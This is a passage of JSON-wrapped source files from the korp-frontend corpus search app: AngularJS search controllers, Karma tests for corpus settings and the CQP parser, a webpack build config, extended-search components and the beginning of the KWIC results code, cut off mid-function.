try {\n updateExtendedCQP()\n } catch (e) {\n c.log(\"Failed to parse CQP\", val)\n c.log(\"Error\", e)\n }\n $location.search(\"cqp\", val)\n })\n\n s.withins = []\n\n s.getWithins = function () {\n const union = settings.corpusListing.getWithinKeys()\n const output = _.map(union, (item) => ({ value: item }))\n return output\n }\n\n return s.$on(\"corpuschooserchange\", function () {\n s.withins = s.getWithins()\n s.within = s.withins[0] && s.withins[0].value\n })\n})\n\nkorpApp.controller(\"ExtendedToken\", function ($scope, utils) {\n const s = $scope\n\n s.removeOr = function (token, and_array, i) {\n if (and_array.length > 1) {\n and_array.splice(i, 1)\n } else if (token.and_block.length > 1) {\n token.and_block.splice(_.indexOf(token.and_block, and_array), 1)\n }\n }\n\n s.addAnd = (token) => {\n token.and_block.push(s.addOr([]))\n }\n\n const toggleBound = function (token, bnd) {\n if (!(token.bound && token.bound[bnd])) {\n const boundObj = {}\n boundObj[bnd] = true\n token.bound = _.extend(token.bound || {}, boundObj)\n } else if (token.bound) {\n delete token.bound[bnd]\n }\n }\n\n s.toggleStart = (token) => toggleBound(token, \"lbound\")\n s.toggleEnd = (token) => toggleBound(token, \"rbound\")\n})\n\n// does nothing semantic, but useful for syntax highlighting.\nlet html = String.raw\nkorpApp.component(\"extendedOrBlock\", {\n bindings: {\n or: \"<\",\n onRemove: \"&\",\n },\n template: html`\n <div class=\"left_col\" ng-click=\"$ctrl.delete($index)\">\n <img class=\"image_button remove_arg\" src=\"${require(\"../img/minus.png\")}\" />\n </div>\n <div class=\"right_col inline_block\" style=\"margin-left: 5px;\">\n <div class=\"arg_selects {{$ctrl.or.type}}\">\n <select\n class=\"arg_type\"\n ng-options=\"obj | mapper:$ctrl.valfilter as obj.label | loc:lang group by obj.group | loc:lang for obj in $ctrl.types\"\n ng-model=\"$ctrl.currentType\"\n ng-change=\"$ctrl.onTypeChange()\"\n ></select>\n\n <select\n class=\"arg_opts\"\n ng-options=\"pair[1] as pair[0] | loc:lang for pair in $ctrl.getOpts($ctrl.currentTypeObj)\"\n ng-model=\"$ctrl.or.op\"\n ></select>\n </div>\n <div\n token-value=\"$ctrl.currentTypeObj\"\n model=\"$ctrl.or.val\"\n or-obj=\"$ctrl.or\"\n class=\"arg_val_container\"\n lang=\"lang\"\n ></div>\n </div>\n `,\n controller($rootScope, utils) {\n let ctrl = this\n ctrl.valfilter = utils.valfilter\n ctrl.types = []\n\n ctrl.currentType = \"\"\n ctrl.currentVal = \"\"\n\n ctrl.delete = function () {\n ctrl.onRemove()\n }\n\n ctrl.$onChanges = function () {\n ctrl.currentTypeObj = ctrl.getType(ctrl.or.type, ctrl.or.val)\n ctrl.currentType = ctrl.currentTypeObj.value\n ctrl.or.type = ctrl.currentTypeObj.cqp_prop || ctrl.currentTypeObj.value\n // ctrl.setDefault()\n }\n\n const onCorpusChange = function (event, selected) {\n // TODO: respect the setting 'wordAttributeSelector' and similar\n if (!(selected && selected.length)) {\n return\n }\n // const lang = s.$parent.$parent && s.$parent.$parent.l && s.$parent.$parent.l.lang\n const lang = $rootScope.lang\n\n const allAttrs = settings.corpusListing.getAttributeGroups(lang)\n ctrl.types = _.filter(allAttrs, (item) => !item.hideExtended)\n // s.currentType = s.getType()\n ctrl.typeMapping = _.fromPairs(\n _.map(ctrl.types, function (item) {\n if (item.isStructAttr) {\n return [`_.${item.value}`, item]\n } else {\n return [item.value, item]\n }\n })\n )\n }\n $rootScope.$on(\"corpuschooserchange\", onCorpusChange)\n\n onCorpusChange(null, settings.corpusListing.selected)\n\n ctrl.onTypeChange = function () {\n ctrl.currentTypeObj = ctrl.typeMapping[ctrl.currentType]\n ctrl.setDefault()\n }\n\n ctrl.setDefault = function () {\n // assign the first value from the opts\n\n ctrl.or.type = ctrl.currentTypeObj.cqp_prop || ctrl.currentTypeObj.value\n\n const opts = ctrl.getOpts(ctrl.currentTypeObj)\n\n if (!opts) {\n ctrl.or.op = \"=\"\n } else {\n ctrl.or.op = _.values(opts)[0][1]\n }\n\n ctrl.or.val = \"\"\n }\n\n // returning new array each time kills angular, hence the memoizing\n ctrl.getOpts = _.memoize(function (confObj) {\n // if (!(type in (s.typeMapping || {}))) {\n // return\n // }\n // let confObj = s.typeMapping && s.typeMapping[type]\n // let confObj = ctrl.getType(cqp_prop, cqp_val)\n if (!confObj) {\n c.log(\"confObj missing\", ctrl.types)\n return\n }\n\n confObj = _.extend({}, (confObj && confObj.opts) || settings.defaultOptions)\n\n if (confObj.type === \"set\") {\n confObj.is = \"contains\"\n }\n\n return _.toPairs(confObj)\n })\n\n ctrl.getType = (cqp_prop, cqp_val) => {\n // return ctrl.typeMapping[cqp_prop]\n cqp_prop = cqp_prop.replace(/^_\\./, \"\")\n let matchingTypes = ctrl.types.filter((type) => type.cqp_prop || type.value == cqp_prop)\n if (matchingTypes.length > 1) {\n return matchingTypes.find((type) => cqp_val.match(type.value_pattern))\n } else {\n return matchingTypes[0]\n }\n }\n },\n})\n\nkorpApp.directive(\"advancedSearch\", () => ({\n controller($scope, compareSearches, $location, $timeout) {\n function updateAdvancedCQP() {\n if ($location.search().search && $location.search().search.split(\"|\")) {\n var [type, ...expr] = $location.search().search.split(\"|\")\n expr = expr.join(\"|\")\n }\n\n if (type === \"cqp\") {\n $scope.cqp = expr || \"[]\"\n } else {\n $scope.cqp = \"[]\"\n }\n }\n\n // init value\n updateAdvancedCQP()\n\n // update value\n $scope.$on(\"updateAdvancedCQP\", () => {\n updateAdvancedCQP()\n })\n\n $scope.$on(\"popover_submit\", (event, name) => compareSearches.saveSearch(name, $scope.cqp))\n\n $scope.$on(\"btn_submit\", function () {\n $location.search(\"search\", null)\n $location.search(\"page\", null)\n $location.search(\"within\", null)\n $location.search(\"in_order\", null)\n $timeout(() => $location.search(\"search\", `cqp|${$scope.cqp}`), 0)\n })\n },\n}))\n\nkorpApp.filter(\"mapper\", () => (item, f) => f(item))\n\nkorpApp.directive(\"compareSearchCtrl\", () => ({\n controller($scope, utils, backend, $rootScope, compareSearches) {\n const s = $scope\n s.valfilter = utils.valfilter\n\n s.savedSearches = compareSearches.savedSearches\n s.$watch(\"savedSearches.length\", function () {\n s.cmp1 = compareSearches.savedSearches[0]\n s.cmp2 = compareSearches.savedSearches[1]\n if (!s.cmp1 || !s.cmp2) {\n return\n }\n\n const listing = settings.corpusListing.subsetFactory(\n _.uniq([].concat(s.cmp1.corpora, s.cmp2.corpora))\n )\n const allAttrs = listing.getAttributeGroups()\n s.currentAttrs = _.filter(allAttrs, (item) => !item.hideCompare)\n })\n\n s.reduce = \"word\"\n\n s.sendCompare = () =>\n $rootScope.compareTabs.push(backend.requestCompare(s.cmp1, s.cmp2, [s.reduce]))\n\n s.deleteCompares = () => compareSearches.flush()\n },\n}))\n\nkorpApp.filter(\"loc\", () => (translationKey, lang) => util.getLocaleString(translationKey, lang))\n"
},
{
"alpha_fraction": 0.5984117984771729,
"alphanum_fraction": 0.6006806492805481,
"avg_line_length": 27.435483932495117,
"blob_id": "1553a857235d06642730c2cbe2b02851fcdda2f0",
"content_id": "a1ed114e6d7679b9a449b71533fc01b68c1ebd8f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1763,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 62,
"path": "/test/karma/spec/corpuslisting.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-undef,\n*/\nwindow.c = console\nwindow._ = require(\"lodash\")\nwindow.settings = {}\nrequire(\"configjs\")\nconst commonSettings = require(\"commonjs\")\n_.map(commonSettings, function(v, k) {\n if (k in window) {\n console.error(`warning, overwriting setting${k}`)\n}\n window[k] = v\n})\n\nrequire(\"../../../app/scripts/util.js\")\nrequire(\"defaultmode\")\n\ndescribe(\"config file\", function() {\n\n it(\"all corpora definitions have the all the required fields\", function() {\n const required_config_fields = [\n \"within\",\n \"context\",\n \"attributes\",\n \"structAttributes\",\n \"id\",\n \"title\"\n ]\n const has_all = _(settings.corpora)\n .values()\n .map(corp => _.values(_.pick(corp, required_config_fields)).length === required_config_fields.length)\n .every()\n\n expect(has_all).toBe(true)\n })\n it(\"has 'context' in all corpora definitions\", function() {\n const within = _(settings.corpora)\n .values()\n .map(item => \"within\" in item)\n .every()\n\n expect(within).toBe(true)\n })\n})\n\n\n\n\n\n\ndescribe(\"settings.corpusListing\", function() {\n const cl = settings.corpusListing\n it('has the same number of corpora as the config', () => expect(cl.corpora.length).toEqual(_.keys(settings.corpora).length))\n\n it('gives no struct attrs intersection with all corpora chosen', () => expect(_.isEmpty(cl.getStructAttrsIntersection())).toBe(true))\n\n it('gives a common attribute from vivill and gp2012', function() {\n const attrs = cl.subsetFactory([\"romi\", \"romii\"]).getStructAttrsIntersection()\n expect(\"text_title\" in attrs && \"text_author\" in attrs).toBe(true)\n })\n})\n"
},
{
"alpha_fraction": 0.4675000011920929,
"alphanum_fraction": 0.5145833492279053,
"avg_line_length": 35.3636360168457,
"blob_id": "583051d181ed086019daef4bec30cae27de8b12b",
"content_id": "3a48108ce6808517c6ebec9798ee5daca4177be4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2400,
"license_type": "permissive",
"max_line_length": 260,
"num_lines": 66,
"path": "/test/karma/spec/cqp_parser.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-undef,\n*/\nrequire(\"../../../app/scripts/cqp_parser/CQPParser.js\")\nrequire(\"../../../app/scripts/cqp_parser/cqp.js\")\nwindow.moment = require(\"moment\")\n\ndescribe(\"parsing\", function() {\n it(\"can parse simple expr\", () =>\n expect(JSON.stringify(CQP.parse(\"[word = 'foo']\")))\n .toEqual('[{\"and_block\":[[{\"type\":\"word\",\"op\":\"=\",\"val\":\"foo\",\"flags\":null}]]}]')\n )\n \n it(\"can parse struct attr\", () =>\n expect(JSON.stringify(CQP.parse(\"[_.text_type = 'bar']\")))\n .toEqual('[{\"and_block\":[[{\"type\":\"_.text_type\",\"op\":\"=\",\"val\":\"bar\",\"flags\":null}]]}]')\n )\n\n\n it(\"can parse a sequence\", () =>\n expect(JSON.stringify(CQP.parse(\"[word = 'foo'] [word = 'bar']\")))\n .toEqual('[{\"and_block\":[[{\"type\":\"word\",\"op\":\"=\",\"val\":\"foo\",\"flags\":null}]]},{\"and_block\":[[{\"type\":\"word\",\"op\":\"=\",\"val\":\"bar\",\"flags\":null}]]}]')\n )\n})\n\nconst basicExpressions = [\n \"[word = \\\"foo\\\"]\",\n \"[word = \\\"foo\\\"] [word = \\\"bar\\\"] [word = \\\"what\\\"]\",\n \"[word = \\\"foo\\\"] []{1,3} [word = \\\"what\\\"]\",\n \"[(word = \\\"foo\\\" | pos = \\\"NN\\\")]\",\n \"[$date_interval = '20130610,20130617,114657,111014']\",\n \"[]\",\n \"[]{5,7}\",\n \"[pos = \\\"PM\\\" & lex contains \\\"katt..nn.1\\\"]\",\n '[word = \"\"\"\"]'\n ]\n\nconst changingExpressions = [\n { input: \"[word = \\\"foo\\\" | pos = \\\"NN\\\"]\", expected: \"[(word = \\\"foo\\\" | pos = \\\"NN\\\")]\" },\n { input: \"[word = 'foo']\", expected: \"[word = \\\"foo\\\"]\" }\n // { input: `[word = '\"']`, expected: '[word = \"\"\"\"]' }\n]\n\nconst expandExpressions = [\n {\n input: \"[$date_interval = \\\"20130610,20130617,114657,111014\\\"]\", \n expected: \"[((int(_.text_datefrom) = 20130610 & int(_.text_timefrom) >= 114657) | (int(_.text_datefrom) > 20130610 & int(_.text_datefrom) <= 20130617)) & (int(_.text_dateto) < 20130617 | (int(_.text_dateto) = 20130617 & int(_.text_timeto) <= 111014))]\"\n }\n]\n\ndescribe(\"parsing\", function() {\n it(\"can parse simple expr\", () =>\n basicExpressions.map((expr) =>\n expect(CQP.stringify(CQP.parse(expr))).toEqual(expr))\n )\n\n it(\"changes\", () =>\n changingExpressions.map((expr) =>\n expect(CQP.stringify(CQP.parse(expr.input))).toEqual(expr.expected))\n )\n\n it(\"expands\", () =>\n expandExpressions.map((expr) =>\n expect(CQP.stringify(CQP.parse(expr.input), true)).toEqual(expr.expected))\n )\n})\n"
},
{
"alpha_fraction": 0.4485122859477997,
"alphanum_fraction": 0.44878649711608887,
"avg_line_length": 27.600000381469727,
"blob_id": "67780ab95a89fa6536e3bc247343c9a9e8d0c5c5",
"content_id": "130a746f82c8cce2092e72e238176fb0156cc654",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 7293,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 255,
"path": "/webpack.common.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst webpack = require(`webpack`);\nconst path = require(`path`);\nconst { CleanWebpackPlugin } = require(`clean-webpack-plugin`);\nconst CopyWebpackPlugin = require(`copy-webpack-plugin`);\n\nfunction getKorpConfigDir() {\n const fs = require(`fs`);\n let config = `app`;\n try {\n const json = fs.readFileSync(`run_config.json`, { encoding: `utf-8` });\n config = JSON.parse(json).configDir || `app`;\n console.log(`Using \"` + config + `\" as config directory.`);\n } catch (err) {\n console.error(err);\n console.log(`No run_config.json given, using \"app\" as config directory (default).`);\n }\n return config;\n}\n\nconst korpConfigDir = getKorpConfigDir();\n\nmodule.exports = {\n resolve: {\n alias: {\n jquery: `jquery/src/jquery`,\n jreject: path.resolve(__dirname, `app/lib/jquery.reject`),\n jquerylocalize: path.resolve(__dirname, `app/lib/jquery.localize`),\n jqueryhoverintent: path.resolve(__dirname, `app/lib/jquery.hoverIntent`),\n configjs: path.resolve(korpConfigDir, `config.js`),\n commonjs: path.resolve(korpConfigDir, `modes/common.js`),\n defaultmode: path.resolve(korpConfigDir, `modes/default_mode.js`),\n customcss: path.resolve(korpConfigDir, `styles/`),\n customscripts: path.resolve(korpConfigDir, `scripts/`),\n customviews: path.resolve(korpConfigDir, `views/`),\n },\n },\n module: {\n rules: [\n {\n test: /\\.js$/,\n exclude: /(node_modules|bower_components)/,\n use: {\n loader: `babel-loader`,\n options: {\n presets: [`@babel/preset-env`],\n },\n },\n },\n {\n test: /\\.tsx?$/,\n use: {\n loader: `ts-loader`,\n options: {\n configFile: path.resolve(__dirname, `tsconfig.json`),\n },\n },\n exclude: /node_modules/,\n },\n {\n test: require.resolve(\n path.resolve(__dirname, `app/scripts/cqp_parser/CQPParser.js`)\n ),\n use: `imports-loader?this=>window`,\n },\n {\n test: /\\.pug$/i,\n exclude: [\n // does not work\n path.resolve(__dirname, `app/index.pug`),\n ],\n use: [\n { loader: `file-loader` },\n {\n loader: `extract-loader`,\n options: { publicPath: `` },\n },\n { loader: `html-loader` },\n { loader: `pug-html-loader` },\n ],\n },\n {\n test: /index.pug$/,\n use: [\n { loader: `file-loader?name=index.html` },\n {\n loader: `extract-loader`,\n options: { publicPath: `` },\n },\n {\n loader: `html-loader`,\n options: {\n attrs: [`img:src`, `link:href`],\n },\n },\n {\n loader: `pug-html-loader`,\n options: {\n // TODO we should not pretty-print HTML, but removing this\n // option will result in that some elements get closer together\n // and need to be fixed with CSS\n pretty: true,\n },\n },\n ],\n },\n {\n test: /\\.html$/,\n exclude: [path.resolve(korpConfigDir, `./views/`)],\n use: [\n { loader: `file-loader` },\n {\n loader: `extract-loader`,\n options: { publicPath: `` },\n },\n { loader: `html-loader` },\n ],\n },\n {\n test: /\\.html$/,\n include: [path.resolve(korpConfigDir, `./views/`)],\n use: [\n {\n loader: `html-loader`,\n options: {\n minimize: true,\n conservativeCollapse: false,\n },\n },\n ],\n },\n {\n test: /\\.(jpe?g|png|gif|svg)$/i,\n loader: `file-loader?name=[name].[contenthash].[ext]`,\n },\n {\n test: /\\.ico$/i,\n loader: `file-loader?name=[name].[ext]`,\n },\n {\n test: /\\.otf$/i,\n loader: `file-loader`,\n },\n {\n test: /\\.woff(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader?mimetype=application/font-woff`,\n },\n {\n test: /\\.woff2(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader?mimetype=application/font-woff`,\n },\n {\n test: /\\.ttf(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader?mimetype=application/octet-stream`,\n },\n {\n test: /\\.eot(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader`,\n },\n {\n test: /\\.css$/,\n use: [{ loader: `style-loader` }, { loader: `css-loader` }],\n },\n {\n test: /\\.scss$/,\n use: [\n `style-loader`, // creates style nodes from JS strings\n {\n loader: `css-loader`,\n options: {\n sourceMap: process.env.NODE_ENV !== `production`,\n },\n },\n {\n loader: `postcss-loader`,\n options: {\n // plugins: () => [require(\"tailwindcss\"), require(\"autoprefixer\")],\n // sourceMap: process.env.NODE_ENV !== \"production\",\n },\n },\n {\n loader: `sass-loader`,\n options: {\n sourceMap: process.env.NODE_ENV !== `production`,\n // sourceMapContents: false\n },\n },\n ],\n },\n ],\n },\n plugins: [\n new CleanWebpackPlugin(),\n new webpack.ProvidePlugin({\n $: `jquery`,\n jQuery: `jquery`,\n }),\n new webpack.IgnorePlugin(/^\\.\\/locale$/, /moment$/),\n new CopyWebpackPlugin({\n patterns: [\n {\n from: korpConfigDir + `/modes/*mode.js`,\n to: `modes`,\n flatten: true,\n },\n {\n from: korpConfigDir + `/modes/*html`,\n to: `modes`,\n flatten: true,\n },\n {\n from: `app/translations/angular-locale_*.js`,\n to: `translations`,\n flatten: true,\n },\n {\n from: `app/markup/msdtags.html`,\n to: `markup`,\n },\n {\n from: `app/translations/locale-*.json`,\n to: `translations`,\n flatten: true,\n },\n {\n from: korpConfigDir + `/translations/*`,\n to: `translations`,\n flatten: true,\n },\n {\n from: `app/lib/deptrees/`,\n to: `lib/deptrees`,\n },\n /* TODO: probably remove this? cannot find any json files there.\n {\n from: \"node_modules/geokorp/dist/data/*.json\",\n // TODO hard-coded in geokorp project that these files should be here\n // we need to change geokorp so that these files are required\n to: \"components/geokorp/dist/data\",\n flatten: true\n }\n */\n ],\n }),\n ],\n entry: {\n bundle: `./app/index.js`,\n worker: `./app/scripts/statistics_worker.ts`,\n },\n output: {\n filename: `[name].js`,\n path: path.resolve(__dirname, `dist`),\n globalObject: `this`,\n },\n};\n"
},
{
"alpha_fraction": 0.4790255129337311,
"alphanum_fraction": 0.4819086194038391,
"avg_line_length": 39.0982666015625,
"blob_id": "34f8380b4c0651fad3b8828b275020a3ad43df9b",
"content_id": "f3f393b0b1f336c69024ab82cc64be5669d0fa74",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6937,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 173,
"path": "/app/scripts/extended.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst korpApp = angular.module(\"korpApp\")\nkorpApp.factory(\"extendedComponents\", function () {\n const autocompleteTemplate = `\\\n <div>\n <input type=\"text\"\n size=\"37\"\n ng-model=\"input\"\n escaper\n typeahead-min-length=\"0\"\n typeahead-input-formatter=\"typeaheadInputFormatter($model)\"\n uib-typeahead=\"tuple[0] as tuple[1] for tuple in getRows($viewValue)\"></input>\n </div>`\n\n const selectTemplate =\n \"<select ng-show='!inputOnly' ng-model='input' escaper ng-options='tuple[0] as tuple[1] for tuple in dataset'></select>\" +\n \"<input ng-show='inputOnly' type='text' ng-model='input'/>\"\n const localize = ($scope) =>\n function (str) {\n if (!$scope.translationKey) {\n return str\n } else {\n return util.getLocaleString(($scope.translationKey || \"\") + str)\n }\n }\n\n const selectController = (autocomplete) => [\n \"$scope\",\n \"structService\",\n function ($scope, structService) {\n const attribute = $scope.$parent.tokenValue.value\n const selectedCorpora = settings.corpusListing.selected\n\n // check which corpora support attributes\n const corpora = []\n for (let corpusSettings of selectedCorpora) {\n if (\n attribute in corpusSettings.structAttributes ||\n attribute in corpusSettings.attributes\n ) {\n corpora.push(corpusSettings.id)\n }\n }\n\n $scope.$watch(\"orObj.op\", (newVal, oldVal) => {\n $scope.inputOnly = $scope.orObj.op !== \"=\" && $scope.orObj.op !== \"!=\"\n if (newVal !== oldVal) {\n $scope.input = \"\"\n }\n })\n\n $scope.loading = true\n const opts = { count: false, returnByCorpora: false }\n if ($scope.type === \"set\") {\n opts.split = true\n }\n structService.getStructValues(corpora, [attribute], opts).then(\n function (data) {\n $scope.loading = false\n const localizer = localize($scope)\n\n const dataset = _.map(_.uniq(data), function (item) {\n if (item === \"\") {\n return [item, util.getLocaleString(\"empty\")]\n }\n return [item, localizer(item)]\n })\n $scope.dataset = _.sortBy(dataset, (tuple) => tuple[1])\n if (!autocomplete) {\n $scope.input = $scope.input || $scope.dataset[0][0]\n }\n },\n () => c.log(\"struct_values error\")\n )\n\n $scope.getRows = function (input) {\n if (input) {\n return _.filter(\n $scope.dataset,\n (tuple) => tuple[0].toLowerCase().indexOf(input.toLowerCase()) !== -1\n )\n } else {\n return $scope.dataset\n }\n }\n\n $scope.typeaheadInputFormatter = (model) => localize($scope)(model)\n },\n ]\n\n // Select-element. Use the following settings in the corpus:\n // - dataset: an object or an array of values\n // - translationKey: a key that will be prepended to the value for lookup in translation files\n // - escape: boolean, will be used by the escaper-directive\n return {\n datasetSelect: {\n template: selectTemplate,\n controller: [\n \"$scope\",\n function ($scope) {\n let dataset\n const localizer = localize($scope)\n if (_.isArray($scope.dataset)) {\n dataset = _.map($scope.dataset, (item) => [item, localizer(item)])\n } else {\n dataset = _.map($scope.dataset, (v, k) => [k, localizer(v)])\n }\n $scope.dataset = _.sortBy(dataset, (tuple) => tuple[1])\n $scope.model = $scope.model || $scope.dataset[0][0]\n },\n ],\n },\n\n // Select-element. Gets values from \"struct_values\"-command. Use the following settings in the corpus:\n // - translationKey: a key that will be prepended to the value for lookup in translation files\n // - escape: boolean, will be used by the escaper-directive\n structServiceSelect: {\n template: selectTemplate,\n controller: selectController(false),\n },\n\n // Autocomplete. Gets values from \"struct_values\"-command. Use the following settings in the corpus:\n // - translationKey: a key that will be prepended to the value for lookup in translation files\n // - escape: boolean, will be used by the escaper-directive\n structServiceAutocomplete: {\n template: autocompleteTemplate,\n controller: selectController(true),\n },\n\n // puts the first values from a dataset paramater into model\n singleValue: {\n template: '<input type=\"hidden\">',\n controller: [\"$scope\", ($scope) => ($scope.model = _.values($scope.dataset)[0])],\n },\n\n defaultTemplate: _.template(`\\\n <input ng-model='input' class='arg_value' escaper \n ng-model-options='{debounce : {default : 300, blur : 0}, updateOn: \"default blur\"}'\n <%= maybe_placeholder %>>\n <span ng-class='{sensitive : case == \"sensitive\", insensitive : case == \"insensitive\"}'\n class='val_mod' popper> Aa </span>\n <ul class='mod_menu popper_menu dropdown-menu'>\n <li><a ng-click='makeSensitive()'>{{'case_sensitive' | loc:lang}}</a></li>\n <li><a ng-click='makeInsensitive()'>{{'case_insensitive' | loc:lang}}</a></li>\n </ul>\n `),\n defaultController: [\n \"$scope\",\n function ($scope) {\n if ($scope.orObj.flags && $scope.orObj.flags.c) {\n $scope.case = \"insensitive\"\n } else {\n $scope.case = \"sensitive\"\n }\n\n $scope.makeSensitive = function () {\n $scope.case = \"sensitive\"\n if ($scope.orObj.flags) {\n delete $scope.orObj.flags[\"c\"]\n }\n }\n\n $scope.makeInsensitive = function () {\n const flags = $scope.orObj.flags || {}\n flags[\"c\"] = true\n $scope.orObj.flags = flags\n\n $scope.case = \"insensitive\"\n }\n },\n ],\n }\n})\n"
},
{
"alpha_fraction": 0.5396237969398499,
"alphanum_fraction": 0.5435332655906677,
"avg_line_length": 26.800445556640625,
"blob_id": "de293dfdf666972898e2eaf274ae26d72896e77e",
"content_id": "fd6755e5391dbfedb91446fa13f17b336e0a8106",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 62414,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 2245,
"path": "/app/scripts/results.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nimport statisticsFormatting from \"../config/statistics_config.js\";\nimport statemachine from \"./statemachine\";\nconst korpFailImg = require(`../img/korp_fail.svg`);\n\nclass BaseResults {\n constructor(resultSelector, tabSelector, scope) {\n this.s = scope;\n this.$tab = $(tabSelector);\n this.$result = $(resultSelector);\n\n this.$result.add(this.$tab).addClass(`not_loading`);\n\n this.injector = angular.injector([`ng`]);\n\n const def = this.injector.get(`$q`).defer();\n this.firstResultDef = def;\n }\n\n onProgress(progressObj) {\n return safeApply(this.s, () => {\n this.s.$parent.progress = Math.round(progressObj.stats);\n this.s.hits_display = util.prettyNumbers(progressObj.total_results);\n });\n }\n\n abort() {\n this.ignoreAbort = false;\n return this.proxy.abort();\n }\n\n getResultTabs() {\n return $(`.result_tabs > ul`).scope().tabset.tabs;\n }\n\n getActiveResultTab() {\n return $(`.result_tabs`).scope().activeTab;\n }\n\n renderResult(data) {\n this.$result.find(`.error_msg`).remove();\n if (data.ERROR) {\n safeApply(this.s, () => {\n return this.firstResultDef.reject();\n });\n\n this.resultError(data);\n return false;\n } else {\n return safeApply(this.s, () => {\n this.firstResultDef.resolve();\n this.hasData = true;\n });\n }\n }\n\n resultError(data) {\n c.error(`json fetch error: `, data);\n this.hidePreloader();\n this.resetView();\n return $(`<object class=\"korp_fail\" type=\"image/svg+xml\" data=\"${korpFailImg}\">`)\n .append(`<img class='korp_fail' src='${korpFailImg}'>`)\n .add($(`<div class='fail_text' />`).localeKey(`fail_text`))\n .addClass(`inline_block`)\n .prependTo(this.$result)\n .wrapAll(`<div class='error_msg'>`);\n }\n\n showPreloader() {\n this.s.$parent.loading = true;\n }\n\n hidePreloader() {\n this.s.$parent.loading = false;\n }\n\n resetView() {\n this.hasData = false;\n return this.$result.find(`.error_msg`).remove();\n }\n\n countCorpora() {\n return this.proxy.prevParams && this.proxy.prevParams.corpus.split(`,`).length;\n }\n\n onentry() {\n this.s.$root.jsonUrl = null;\n this.firstResultDef.promise.then(() => {\n const prevUrl = this.proxy && this.proxy.prevUrl;\n this.s.$apply(($scope) => ($scope.$root.jsonUrl = prevUrl));\n });\n }\n\n onexit() {\n this.s.$root.jsonUrl = null;\n }\n\n isActive() {\n return this.getActiveResultTab() === this.tabindex;\n }\n}\n\nview.KWICResults = class KWICResults extends BaseResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n\n this.proxy = new model.KWICProxy();\n window.kwicProxy = this.proxy;\n\n this.tabindex = 0;\n\n this.s = scope;\n\n this.selectionManager = scope.selectionManager;\n this.setupReadingHash();\n this.$result.click((event) => {\n if (\n event.target.id === `frontendDownloadLinks` ||\n event.target.classList.contains(`kwicDownloadLink`)\n ) {\n return;\n }\n if (!this.selectionManager.hasSelected()) {\n return;\n }\n this.selectionManager.deselect();\n statemachine.send(`DESELECT_WORD`);\n });\n\n $(document).keydown($.proxy(this.onKeydown, this));\n\n this.$result.on(`click`, `.word`, (event) => this.onWordClick(event));\n }\n\n setupReadingHash() {\n return this.s.setupReadingHash();\n }\n\n onWordClick(event) {\n if (this.isActive()) {\n }\n const scope = $(event.currentTarget).scope();\n const obj = scope.wd;\n const sent = scope.sentence;\n event.stopPropagation();\n const word = $(event.target);\n\n statemachine.send(`SELECT_WORD`, {\n sentenceData: sent.structs,\n wordData: obj,\n corpus: sent.corpus.toLowerCase(),\n tokens: sent.tokens,\n inReadingMode: false,\n });\n // if ($(\"#sidebar\").data()[\"korpSidebar\"]) {\n // s.$broadcast(\"wordSelected\", sent.structs, obj, sent.corpus.toLowerCase(), sent.tokens)\n // $(\"#sidebar\").sidebar(\n // \"updateContent\",\n // sent.structs,\n // obj,\n // sent.corpus.toLowerCase(),\n // sent.tokens\n // )\n // }\n\n this.selectWord(word, scope, sent);\n }\n\n selectWord(word, scope) {\n const obj = scope.wd;\n let aux = null;\n if (obj.dephead != null) {\n const i = Number(obj.dephead);\n\n const paragraph = word.closest(`.sentence`).find(`.word`);\n let sent_start = 0;\n const querySentStart = `.open_sentence`;\n if (word.is(querySentStart)) {\n sent_start = paragraph.index(word);\n } else {\n const l = paragraph.filter(\n (__, item) => $(item).is(word) || $(item).is(querySentStart),\n );\n sent_start = paragraph.index(l.eq(l.index(word) - 1));\n }\n aux = $(paragraph.get(sent_start + i - 1));\n }\n scope.selectionManager.select(word, aux);\n }\n\n resetView() {\n super.resetView();\n }\n\n getProxy() {\n return this.proxy;\n }\n\n isReadingMode() {\n return this.s.reading_mode;\n }\n\n onentry() {\n super.onentry();\n\n this.$result.find(`.token_selected`).click();\n _.defer(() => this.centerScrollbar());\n }\n\n onexit() {\n super.onexit();\n statemachine.send(`DESELECT_WORD`);\n }\n\n onKeydown(event) {\n let next;\n const isSpecialKeyDown = event.shiftKey || event.ctrlKey || event.metaKey;\n if (\n isSpecialKeyDown ||\n $(`input, textarea, select`).is(`:focus`) ||\n !this.$result.is(`:visible`)\n ) {\n return;\n }\n\n switch (event.which) {\n case 78: // n\n safeApply(this.s, () => {\n this.s.$parent.pageChange(this.s.$parent.page + 1);\n });\n return false;\n case 70: // f\n if (this.s.$parent.page === 0) {\n return;\n }\n safeApply(this.s, () => {\n this.s.$parent.pageChange(this.s.$parent.page - 1);\n });\n return false;\n }\n if (!this.selectionManager.hasSelected()) {\n return;\n }\n switch (event.which) {\n case 38: // up\n next = this.selectUp();\n break;\n case 39: // right\n next = this.selectNext();\n break;\n case 37: // left\n next = this.selectPrev();\n break;\n case 40: // down\n next = this.selectDown();\n 